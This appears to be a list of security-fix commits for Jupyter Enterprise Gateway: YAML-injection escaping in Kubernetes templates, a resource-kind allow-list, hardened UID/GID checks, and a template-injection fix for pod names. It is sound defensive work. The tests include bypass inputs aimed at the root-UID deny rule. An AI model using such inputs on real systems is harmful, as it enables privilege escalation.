    -        memory: "{{ kernel_memory_limit }}"
    +        memory: {{ kernel_memory_limit | yaml_safe }}
             {% endif %}
             {% if kernel_gpus_limit is defined %}
    -        nvidia.com/gpu: "{{ kernel_gpus_limit }}"
    +        nvidia.com/gpu: {{ kernel_gpus_limit | yaml_safe }}
             {% endif %}
           {% endif %}
         {% endif %}
         {% if kernel_working_dir %}
    -    workingDir: "{{ kernel_working_dir }}"
    +    workingDir: {{ kernel_working_dir | yaml_safe }}
         {% endif %}
         volumeMounts:
     # Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
         {% if kernel_volume_mounts %}
           {% for volume_mount in kernel_volume_mounts %}
    -    - {{ volume_mount }}
    +    - {{ volume_mount | yaml_safe }}
           {% endfor %}
         {% endif %}
       volumes:
     # Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client
       {% if kernel_volumes %}
         {% for volume in kernel_volumes %}
    -  - {{ volume }}
    +  - {{ volume | yaml_safe }}
         {% endfor %}
       {% endif %}
    
  • etc/kernel-launchers/kubernetes/scripts/launch_kubernetes.py · +52 -6 · modified
    @@ -15,6 +15,26 @@
     
     KERNEL_POD_TEMPLATE_PATH = "/kernel-pod.yaml.j2"
     
    +ALLOWED_K8S_KINDS = {"Pod", "Secret", "PersistentVolumeClaim", "PersistentVolume", "Service", "ConfigMap"}
    +MAX_DOCUMENTS_PER_KIND = 1
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template.
    +
    +    Uses PyYAML's own serializer to produce properly escaped output:
    +    - Strings are double-quoted with special characters escaped.
    +    - Dicts/lists are serialized as YAML flow mappings/sequences.
    +    - None, bools, and numbers are serialized to their YAML-canonical form.
    +    """
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
     
     def generate_kernel_pod_yaml(keywords):
         """Return the kubernetes pod spec as a yaml string.
    @@ -35,9 +55,8 @@ def generate_kernel_pod_yaml(keywords):
                 default=True,
             ),
         )
    -    # jinja2 template substitutes template variables with None though keywords doesn't
    -    # contain corresponding item. Therefore, no need to check if any are left unsubstituted.
    -    # Kubernetes API server will validate the pod spec instead.
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +
         k8s_yaml = j_env.get_template(KERNEL_POD_TEMPLATE_PATH).render(**keywords)
     
         return k8s_yaml
    @@ -128,10 +147,20 @@ def launch_kubernetes_kernel(
         )
     
         # Walk env variables looking for names prefixed with KERNEL_.  When found, set corresponding keyword value
    -    # with name in lower case.
    +    # with name in lower case.  Only parse YAML for variables that legitimately carry structured data
    +    # (lists/dicts); treat all others as raw strings to prevent YAML injection attacks.
         for name, value in os.environ.items():
             if name.startswith("KERNEL_"):
    -            keywords[name.lower()] = yaml.safe_load(value)
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if not isinstance(parsed, list) or not all(isinstance(item, dict) for item in parsed):
    +                    sys.exit(
    +                        f"ERROR - {name} must be a YAML list of mappings - "
    +                        f"kernel launch terminating!"
    +                    )
    +                keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
     
         # Substitute all template variable (wrapped with {{ }}) and generate `yaml` string.
         k8s_yaml = generate_kernel_pod_yaml(keywords)
    @@ -146,7 +175,24 @@ def launch_kubernetes_kernel(
         pod_template = None
         pod_created = None
         kernel_namespace = keywords["kernel_namespace"]
    -    k8s_objs = yaml.safe_load_all(k8s_yaml)
    +    k8s_objs = list(yaml.safe_load_all(k8s_yaml))
    +    kind_counts: Dict[str, int] = {}
    +    for k8s_obj in k8s_objs:
    +        if not k8s_obj:
    +            continue
    +        kind = k8s_obj.get("kind")
    +        if kind not in ALLOWED_K8S_KINDS:
    +            sys.exit(
    +                f"ERROR - Unexpected resource kind '{kind}' in rendered manifest - "
    +                f"kernel launch terminating!"
    +            )
    +        kind_counts[kind] = kind_counts.get(kind, 0) + 1
    +    for kind, count in kind_counts.items():
    +        if count > MAX_DOCUMENTS_PER_KIND:
    +            sys.exit(
    +                f"ERROR - Rendered manifest contains {count} '{kind}' documents "
    +                f"(max {MAX_DOCUMENTS_PER_KIND}) - kernel launch terminating!"
    +            )
         for k8s_obj in k8s_objs:
             if k8s_obj.get("kind"):
                 if k8s_obj["kind"] == "Pod":
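
The kind check added to `launch_kubernetes_kernel` can be sketched in isolation. This version assumes the manifest has already been parsed into a list of dicts, so it does not need PyYAML, and it raises `ValueError` where the patch calls `sys.exit`. The helper name `check_manifest_kinds` is hypothetical.

```python
from collections import Counter

ALLOWED_KINDS = {
    "Pod", "Secret", "PersistentVolumeClaim",
    "PersistentVolume", "Service", "ConfigMap",
}
MAX_PER_KIND = 1


def check_manifest_kinds(documents):
    """Raise ValueError if any document has a disallowed or repeated kind."""
    counts = Counter()
    for doc in documents:
        if not doc:  # skip empty documents, e.g. after a trailing '---'
            continue
        kind = doc.get("kind")
        if kind not in ALLOWED_KINDS:
            raise ValueError(f"unexpected resource kind {kind!r}")
        counts[kind] += 1
        if counts[kind] > MAX_PER_KIND:
            raise ValueError(f"more than {MAX_PER_KIND} {kind!r} document(s)")
    return dict(counts)


print(check_manifest_kinds([{"kind": "Pod"}, None, {"kind": "Secret"}]))
```

Rejecting both unknown kinds and duplicate kinds limits what an injected `---` document separator could add to the rendered manifest.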
    
  • etc/kernel-launchers/operators/scripts/launch_custom_resource.py · +38 -1 · modified
    @@ -2,6 +2,7 @@
     """Launch a custom operator resource."""
     import argparse
     import os
    +import re
     import sys
     
     import urllib3
    @@ -11,6 +12,24 @@
     
     urllib3.disable_warnings()
     
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template.
    +
    +    Uses PyYAML's own serializer to produce properly escaped output:
    +    - Strings are double-quoted with special characters escaped.
    +    - Dicts/lists are serialized as YAML flow mappings/sequences.
    +    - None, bools, and numbers are serialized to their YAML-canonical form.
    +    """
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
     
     def generate_kernel_custom_resource_yaml(kernel_crd_template, keywords):
         """Generate the kernel custom resource yaml given a template."""
    @@ -27,6 +46,8 @@ def generate_kernel_custom_resource_yaml(kernel_crd_template, keywords):
                 default=True,
             ),
         )
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +
         k8s_yaml = j_env.get_template("/" + kernel_crd_template + ".yaml.j2").render(**keywords)
         return k8s_yaml
     
    @@ -70,18 +91,34 @@ def launch_custom_resource_kernel(
         )
         keywords["spark_context_initialization_mode"] = spark_context_init_mode
     
    +    # Only parse YAML for variables that legitimately carry structured data (lists/dicts);
    +    # treat all others as raw strings to prevent YAML injection attacks.
         for name, value in os.environ.items():
             if name.startswith("KERNEL_"):
    -            keywords[name.lower()] = yaml.safe_load(value)
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if not isinstance(parsed, list) or not all(isinstance(item, dict) for item in parsed):
    +                    sys.exit(
    +                        f"ERROR - {name} must be a YAML list of mappings - "
    +                        f"kernel launch terminating!"
    +                    )
    +                keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
     
         kernel_crd_template = keywords["kernel_crd_group"] + "-" + keywords["kernel_crd_version"]
    +    if not re.match(r'^[a-z0-9][a-z0-9.\-]*-v[a-z0-9]+$', kernel_crd_template):
    +        sys.exit(f"ERROR - Invalid CRD template name: {kernel_crd_template} - kernel launch terminating!")
    +
         custom_resource_yaml = generate_kernel_custom_resource_yaml(kernel_crd_template, keywords)
     
         kernel_namespace = keywords["kernel_namespace"]
         group = keywords["kernel_crd_group"]
         version = keywords["kernel_crd_version"]
         plural = keywords["kernel_crd_plural"]
         custom_resource_object = yaml.safe_load(custom_resource_yaml)
    +    if not isinstance(custom_resource_object, dict) or "kind" not in custom_resource_object:
    +        sys.exit("ERROR - Rendered CRD manifest is not a valid single-document YAML - kernel launch terminating!")
         if group == "sparkoperator.k8s.io":
             extend_operator_env(custom_resource_object, "driver")
             extend_operator_env(custom_resource_object, "executor")
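
Because `kernel_crd_template` is concatenated into the template path passed to `get_template`, the patch validates it against a regular expression first. A small sketch of that check, reusing the pattern from the diff; the wrapper `is_valid_crd_template_name` and the sample inputs are hypothetical.

```python
import re

# Pattern copied from the patch: lowercase group name, then "-v<version>".
CRD_TEMPLATE_NAME = re.compile(r'^[a-z0-9][a-z0-9.\-]*-v[a-z0-9]+$')


def is_valid_crd_template_name(group: str, version: str) -> bool:
    """Return True if '<group>-<version>' is an acceptable template name."""
    return CRD_TEMPLATE_NAME.match(f"{group}-{version}") is not None


print(is_valid_crd_template_name("sparkoperator.k8s.io", "v1beta2"))
print(is_valid_crd_template_name("../../etc/passwd", "v1"))
```

The character class excludes `/`, so a group or version containing path separators fails the check before any template lookup happens.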
    
  • etc/kernel-launchers/operators/scripts/sparkoperator.k8s.io-v1beta2.yaml.j2 · +16 -16 · modified
    @@ -1,26 +1,26 @@
     apiVersion: "sparkoperator.k8s.io/v1beta2"
     kind: SparkApplication
     metadata:
    -  name: {{ kernel_resource_name }}
    +  name: {{ kernel_resource_name | yaml_safe }}
     spec:
       restartPolicy:
         type: Never
       type: Python
       pythonVersion: "3"
       sparkVersion: 2.4.5
    -  image: {{ kernel_image }}
    +  image: {{ kernel_image | yaml_safe }}
       mainApplicationFile: "local:///usr/local/bin/kernel-launchers/python/scripts/launch_ipykernel.py"
       arguments:
         - "--kernel-id"
    -    - "{{ kernel_id }}"
    +    - {{ kernel_id | yaml_safe }}
         - "--spark-context-initialization-mode"
    -    - "{{ spark_context_initialization_mode }}"
    +    - {{ spark_context_initialization_mode | yaml_safe }}
         - "--response-address"
    -    - "{{ eg_response_address }}"
    +    - {{ eg_response_address | yaml_safe }}
         - "--port-range"
    -    - "{{ eg_port_range }}"
    +    - {{ eg_port_range | yaml_safe }}
         - "--public-key"
    -    - "{{ eg_public_key }}"
    +    - {{ eg_public_key | yaml_safe }}
       driver:
         annotations:
           cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
    @@ -30,9 +30,9 @@ spec:
     # e.g., helm install my-release spark-operator/spark-operator --namespace spark-operator --set webhook.enable=true
     #    - name: MY_DRIVER_ENV
     #      value: "my_driver_value"
    -    serviceAccount: "{{ kernel_service_account_name }}"
    +    serviceAccount: {{ kernel_service_account_name | yaml_safe }}
         labels:
    -      kernel_id: "{{ kernel_id }}"
    +      kernel_id: {{ kernel_id | yaml_safe }}
           app: enterprise-gateway
           component: kernel
         cores: 1
    @@ -41,13 +41,13 @@ spec:
         volumeMounts:
           {% if kernel_volume_mounts is defined %}
             {% for mount in kernel_volume_mounts %}
    -      - {{ mount }}
    +      - {{ mount | yaml_safe }}
             {% endfor %}
           {% endif %}
         volumes:
           {% if kernel_volumes is defined %}
             {% for volume in kernel_volumes %}
    -      - {{ volume }}
    +      - {{ volume | yaml_safe }}
             {% endfor %}
           {% endif %}
       executor:
    @@ -58,26 +58,26 @@ spec:
     #    - name: MY_EXECUTOR_ENV
     #      value: "my_executor_value"
         labels:
    -      kernel_id: "{{ kernel_id }}"
    +      kernel_id: {{ kernel_id | yaml_safe }}
           app: enterprise-gateway
           component: worker
    -    image: {{ kernel_executor_image }}
    +    image: {{ kernel_executor_image | yaml_safe }}
         instances: 2
         cores: 1
         coreLimit: 1000m
         memory: 1g
         volumeMounts:
           {% if kernel_volume_mounts is defined %}
             {% for mount in kernel_volume_mounts %}
    -      - {{ mount }}
    +      - {{ mount | yaml_safe }}
             {% endfor %}
           {% endif %}
         volumes:
           {% if kernel_volumes is defined %}
             {% for volume in kernel_volumes %}
    -      - {{ volume }}
    +      - {{ volume | yaml_safe }}
             {% endfor %}
           {% endif %}
     {% if kernel_sparkapp_config_map %}
    -  sparkConfigMap: {{ kernel_sparkapp_config_map }}
    +  sparkConfigMap: {{ kernel_sparkapp_config_map | yaml_safe }}
     {% endif %}
    
562068d0c6c6

Enhance validation of UID and GUID against prohibited ids

https://github.com/jupyter-server/enterprise_gateway · Luciano Resende · Apr 25, 2026 · Fixed in 3.3.0 via ghsa-release-walk
2 files changed · +259 -17
  • enterprise_gateway/services/processproxies/container.py · +75 -15 · modified
    @@ -6,6 +6,7 @@
     from __future__ import annotations
     
     import abc
    +import logging
     import os
     import signal
     from typing import Any
    @@ -16,18 +17,48 @@
     from ..kernels.remotemanager import RemoteKernelManager
     from .processproxy import RemoteProcessProxy
     
    +log = logging.getLogger(__name__)
    +
     urllib3.disable_warnings()
     
     local_ip = localinterfaces.public_ips()[0]
     
     default_kernel_uid = "1000"  # jovyan user is the default
     default_kernel_gid = "100"  # users group is the default
     
    +
    +def _parse_prohibited_ids(env_var: str, default: str) -> list[int]:
    +    """Parse a comma-separated list of IDs from an environment variable into integers.
    +
    +    Raises:
    +        ValueError: If any entry in the configured value is not a valid integer.
    +            This enforces a fail-closed posture — a misconfigured prohibited list
    +            (e.g. usernames instead of numeric IDs) will prevent startup rather than
    +            silently yielding an empty list.
    +    """
    +    result: list[int] = []
    +    raw_value = os.getenv(env_var, default)
    +    for item in raw_value.split(","):
    +        item = item.strip()
    +        if item:
    +            try:
    +                result.append(int(item))
    +            except ValueError:
    +                msg = (
    +                    f"Invalid entry '{item}' in {env_var}='{raw_value}'. "
    +                    f"All entries must be numeric IDs, not usernames or group names. "
    +                    f"Example: {env_var}=0,1000"
    +                )
    +                log.critical(msg)
    +                raise ValueError(msg)
    +    return result
    +
    +
     # These could be enforced via a PodSecurityPolicy, but those affect
     # all pods so the cluster admin would need to configure those for
     # all applications.
    -prohibited_uids = os.getenv("EG_PROHIBITED_UIDS", "0").split(",")
    -prohibited_gids = os.getenv("EG_PROHIBITED_GIDS", "0").split(",")
    +prohibited_uids = _parse_prohibited_ids("EG_PROHIBITED_UIDS", "0")
    +prohibited_gids = _parse_prohibited_ids("EG_PROHIBITED_GIDS", "0")
     
     mirror_working_dirs = bool(os.getenv("EG_MIRROR_WORKING_DIRS", "false").lower() == "true")
     
    @@ -110,22 +141,51 @@ def _enforce_prohibited_ids(self, **kwargs: dict[str, Any] | None) -> None:
             kernel_uid = kwargs["env"].get("KERNEL_UID", default_kernel_uid)
             kernel_gid = kwargs["env"].get("KERNEL_GID", default_kernel_gid)
     
    -        if kernel_uid in prohibited_uids:
    -            http_status_code = 403
    -            error_message = (
    -                f"Kernel's UID value of '{kernel_uid}' has been denied via EG_PROHIBITED_UIDS!"
    +        try:
    +            uid_int = int(kernel_uid)
    +        except (ValueError, TypeError):
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Invalid KERNEL_UID value '{kernel_uid}': not a valid integer!",
    +            )
    +
    +        try:
    +            gid_int = int(kernel_gid)
    +        except (ValueError, TypeError):
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Invalid KERNEL_GID value '{kernel_gid}': not a valid integer!",
    +            )
    +
    +        max_id = 4294967295  # uint32 max — Linux uid_t/gid_t upper bound
    +
    +        if not (0 <= uid_int <= max_id):
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Invalid KERNEL_UID value '{kernel_uid}': must be in range 0-{max_id}!",
    +            )
    +
    +        if not (0 <= gid_int <= max_id):
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Invalid KERNEL_GID value '{kernel_gid}': must be in range 0-{max_id}!",
                 )
    -            self.log_and_raise(http_status_code=http_status_code, reason=error_message)
    -        elif kernel_gid in prohibited_gids:
    -            http_status_code = 403
    -            error_message = (
    -                f"Kernel's GID value of '{kernel_gid}' has been denied via EG_PROHIBITED_GIDS!"
    +
    +        if uid_int in prohibited_uids:
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Kernel's UID value of '{kernel_uid}' has been denied via EG_PROHIBITED_UIDS!",
    +            )
    +
    +        if gid_int in prohibited_gids:
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Kernel's GID value of '{kernel_gid}' has been denied via EG_PROHIBITED_GIDS!",
                 )
    -            self.log_and_raise(http_status_code=http_status_code, reason=error_message)
     
    -        # Ensure the kernel's env has what it needs in case they came from defaults
    -        kwargs["env"]["KERNEL_UID"] = kernel_uid
    -        kwargs["env"]["KERNEL_GID"] = kernel_gid
    +        # Ensure the kernel's env has normalized values
    +        kwargs["env"]["KERNEL_UID"] = str(uid_int)
    +        kwargs["env"]["KERNEL_GID"] = str(gid_int)
     
         def poll(self) -> bool | None:
             """Determines if container is still active.
    
  • enterprise_gateway/tests/test_process_proxy.py · +184 -2 · modified
    @@ -1,15 +1,195 @@
     # Copyright (c) Jupyter Development Team.
     # Distributed under the terms of the Modified BSD License.
    -"""Tests for Kubernetes process proxy security fixes."""
    +"""Tests for process proxy functionality."""
     
    +import os
     import unittest
     from unittest.mock import Mock, patch
     
    +from tornado import web
    +
    +from enterprise_gateway.services.processproxies.container import _parse_prohibited_ids
    +
     # Mock Kubernetes configuration before importing the module
     with patch('kubernetes.config.load_incluster_config'), patch('kubernetes.config.load_kube_config'):
         from enterprise_gateway.services.processproxies.k8s import KubernetesProcessProxy
     
     
    +class TestParseProhibitedIds(unittest.TestCase):
    +    """Test parsing of prohibited UID/GID environment variables."""
    +
    +    def test_default_value(self):
    +        with patch.dict(os.environ, {}, clear=False):
    +            os.environ.pop("TEST_IDS", None)
    +            result = _parse_prohibited_ids("TEST_IDS", "0")
    +        self.assertEqual(result, [0])
    +
    +    def test_multiple_values(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "0,1000"}):
    +            result = _parse_prohibited_ids("TEST_IDS", "0")
    +        self.assertEqual(result, [0, 1000])
    +
    +    def test_values_with_spaces(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "0, 1000, 65534"}):
    +            result = _parse_prohibited_ids("TEST_IDS", "0")
    +        self.assertEqual(result, [0, 1000, 65534])
    +
    +    def test_invalid_entries_raise_value_error(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "0,abc,1000"}):
    +            with self.assertRaises(ValueError) as ctx:
    +                _parse_prohibited_ids("TEST_IDS", "0")
    +            self.assertIn("abc", str(ctx.exception))
    +            self.assertIn("TEST_IDS", str(ctx.exception))
    +
    +    def test_username_instead_of_uid_raises_value_error(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "root"}):
    +            with self.assertRaises(ValueError) as ctx:
    +                _parse_prohibited_ids("TEST_IDS", "0")
    +            self.assertIn("root", str(ctx.exception))
    +
    +    def test_empty_entries_ignored(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "0,,1000"}):
    +            result = _parse_prohibited_ids("TEST_IDS", "0")
    +        self.assertEqual(result, [0, 1000])
    +
    +
    +class TestContainerProxyProhibitedIds(unittest.TestCase):
    +    """Test UID/GID validation in ContainerProcessProxy."""
    +
    +    def setUp(self):
    +        self.mock_kernel_manager = Mock()
    +        self.mock_kernel_manager.get_kernel_username.return_value = "testuser"
    +        self.mock_kernel_manager.port_range = "0..0"
    +        self.proxy_config = {"kernel_id": "test-kernel-id", "kernel_name": "python3"}
    +        with patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager, patch(
    +            'enterprise_gateway.services.processproxies.processproxy.ResponseManager'
    +        ):
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            self.proxy = KubernetesProcessProxy(self.mock_kernel_manager, self.proxy_config)
    +
    +    def _make_kwargs(self, uid=None, gid=None):
    +        env = {}
    +        if uid is not None:
    +            env["KERNEL_UID"] = uid
    +        if gid is not None:
    +            env["KERNEL_GID"] = gid
    +        return {"env": env}
    +
    +    def test_valid_uid_gid_passes(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="100")
    +        self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(kwargs["env"]["KERNEL_UID"], "1000")
    +        self.assertEqual(kwargs["env"]["KERNEL_GID"], "100")
    +
    +    def test_defaults_used_when_not_provided(self):
    +        kwargs = self._make_kwargs()
    +        self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(kwargs["env"]["KERNEL_UID"], "1000")
    +        self.assertEqual(kwargs["env"]["KERNEL_GID"], "100")
    +
    +    def test_prohibited_uid_exact_match(self):
    +        kwargs = self._make_kwargs(uid="0", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_prohibited_gid_exact_match(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="0")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_trailing_whitespace_uid_denied(self):
    +        kwargs = self._make_kwargs(uid="0 ", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_leading_whitespace_uid_denied(self):
    +        kwargs = self._make_kwargs(uid=" 0", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_leading_zeros_uid_denied(self):
    +        kwargs = self._make_kwargs(uid="00", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_plus_sign_uid_denied(self):
    +        kwargs = self._make_kwargs(uid="+0", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_non_numeric_uid_rejected(self):
    +        kwargs = self._make_kwargs(uid="abc", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_empty_uid_rejected(self):
    +        kwargs = self._make_kwargs(uid="", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_negative_uid_rejected(self):
    +        kwargs = self._make_kwargs(uid="-1", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("must be in range", ctx.exception.reason)
    +
    +    def test_negative_gid_rejected(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="-1")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("must be in range", ctx.exception.reason)
    +
    +    def test_uid_exceeding_uint32_max_rejected(self):
    +        kwargs = self._make_kwargs(uid="4294967296", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("must be in range", ctx.exception.reason)
    +
    +    def test_gid_exceeding_uint32_max_rejected(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="4294967296")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("must be in range", ctx.exception.reason)
    +
    +    def test_uid_at_uint32_max_allowed(self):
    +        kwargs = self._make_kwargs(uid="4294967295", gid="100")
    +        self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(kwargs["env"]["KERNEL_UID"], "4294967295")
    +
    +    def test_normalized_values_stored(self):
    +        kwargs = self._make_kwargs(uid=" 1000 ", gid=" 100 ")
    +        self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(kwargs["env"]["KERNEL_UID"], "1000")
    +        self.assertEqual(kwargs["env"]["KERNEL_GID"], "100")
    +
    +    def test_both_uid_and_gid_checked_independently(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="0")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("GID", ctx.exception.reason)
    +
    +    def test_trailing_whitespace_gid_denied(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="0 ")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +
     class TestKubernetesProcessProxy(unittest.TestCase):
         """Test secure template substitution in Kubernetes process proxy."""
     
    @@ -23,7 +203,9 @@ def setUp(self):
             self.proxy_config = {"kernel_id": "test-kernel-id", "kernel_name": "python3"}
             with patch(
                 'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    -        ) as mock_session_manager:
    +        ) as mock_session_manager, patch(
    +            'enterprise_gateway.services.processproxies.processproxy.ResponseManager'
    +        ):
                 mock_session_manager.get_kernel_username.return_value = "testuser"
                 self.proxy = KubernetesProcessProxy(self.mock_kernel_manager, self.proxy_config)
                 self.proxy.kernel_id = "test-kernel-id"
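
The core of this commit is the move from string membership to integer comparison in `_enforce_prohibited_ids`. A minimal sketch contrasting the two checks under the default prohibited list of `0`; `old_check` and `new_check` are hypothetical stand-ins that return a boolean instead of calling `log_and_raise`.

```python
prohibited_as_strings = "0".split(",")  # pre-patch: ["0"]
prohibited_as_ints = [0]                # post-patch: parsed integers
MAX_ID = 4294967295                     # uint32 upper bound used by the patch


def old_check(kernel_uid: str) -> bool:
    """Return True if the pre-patch string comparison rejects the UID."""
    return kernel_uid in prohibited_as_strings


def new_check(kernel_uid: str) -> bool:
    """Return True if the UID is rejected after integer normalization."""
    try:
        uid = int(kernel_uid)
    except (ValueError, TypeError):
        return True  # not an integer: reject
    if not 0 <= uid <= MAX_ID:
        return True  # out of range: reject
    return uid in prohibited_as_ints


for candidate in ["0", "0 ", " 0", "00", "+0", "1000"]:
    print(repr(candidate), old_check(candidate), new_check(candidate))
```

Only the exact string `"0"` is caught by the old comparison, while `int()` maps every spelling of zero in the loop to the same value, which is why the patch also writes the normalized `str(uid_int)` back into the kernel environment.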
    
2d5584351c95

Upgrade the base docker image of kernel-r (#1438)

https://github.com/jupyter-server/enterprise_gateway · Santan Maddi · Mar 6, 2026 · Fixed in 3.3.0 via ghsa-release-walk
1 file changed · +1 -1
  • etc/docker/kernel-r/Dockerfile · +1 -1 · modified
    @@ -1,5 +1,5 @@
     # Ubuntu 18.04.1 LTS Bionic
    -ARG BASE_CONTAINER=jupyter/r-notebook:2023-03-13
    +ARG BASE_CONTAINER=quay.io/jupyter/r-notebook:r-4.5.2
     FROM $BASE_CONTAINER
     
     RUN conda install --quiet --yes \
    
1e6b2f354976

Fix KERNEL_POD_NAME substitution to avoid SSTI (#1412)

https://github.com/jupyter-server/enterprise_gateway · Luciano Resende · Aug 9, 2025 · Fixed in 3.3.0 via ghsa-release-walk
4 files changed · +287 -9
  • docs/source/users/kernel-envs.md · +5 -2 · modified
    @@ -76,9 +76,12 @@ There are several supported `KERNEL_` variables that the Enterprise Gateway serv
         it is the user's responsibility that KERNEL_POD_NAME is unique relative to
         any pods in the target namespace.  In addition, the pod must NOT exist -
         unlike the case if KERNEL_NAMESPACE is provided. The KERNEL_POD_NAME can
    -    also be provided as a jinja2 template string
    +    also be provided as a jinja2 template formatted string
         (e.g "{{ kernel_prefix }}-{{ kernel_id | replace('-', '') }}")
    -    which will be evaluated against existing list of environment variables.
    +    which will be processed for safe substitution against existing list
    +    of environment variables. In case of invalid template (e.g. missing variables)
    +    it will fall back to original way to calculate the pod name using
    +    KERNEL_USERNAME - KERNEL_ID.
     
       KERNEL_REMOTE_HOST=<remote host name>
         DistributedProcessProxy only.  When specified, this value will override the
    
  • enterprise_gateway/services/processproxies/k8s.py · +50 -6 · modified
    @@ -11,7 +11,6 @@
     from typing import Any
     
     import urllib3
    -from jinja2 import BaseLoader, Environment
     from kubernetes import client, config
     
     from ..kernels.remotemanager import RemoteKernelManager
    @@ -216,6 +215,42 @@ def terminate_container_resources(self) -> bool | None:
     
             return result
     
    +    def _safe_template_substitute(self, template_str: str, variables: dict) -> str | None:
    +        """
    +        Safely substitute variables in Jinja2-style template syntax.
    +        Only supports simple variable substitution: {{ variable_name }}
    +        Logs missing variables and returns None if any are missing.
    +        """
    +        # Pattern to match {{ variable_name }} with optional whitespace
    +        # Explicitly exclude variables starting with underscore to prevent magic method attacks
    +        pattern = r'\{\{\s*([a-zA-Z][a-zA-Z0-9_]*)\s*\}\}'
    +        missing_vars = []
    +
    +        def replace_var(match):
    +            var_name = match.group(1)
    +            if var_name in variables:
    +                return str(variables[var_name])
    +            else:
    +                missing_vars.append(var_name)
    +                return match.group(0)  # Keep original placeholder
    +
    +        result = re.sub(pattern, replace_var, template_str)
    +
    +        # Check if there are any remaining {{ }} patterns that didn't match our simple pattern
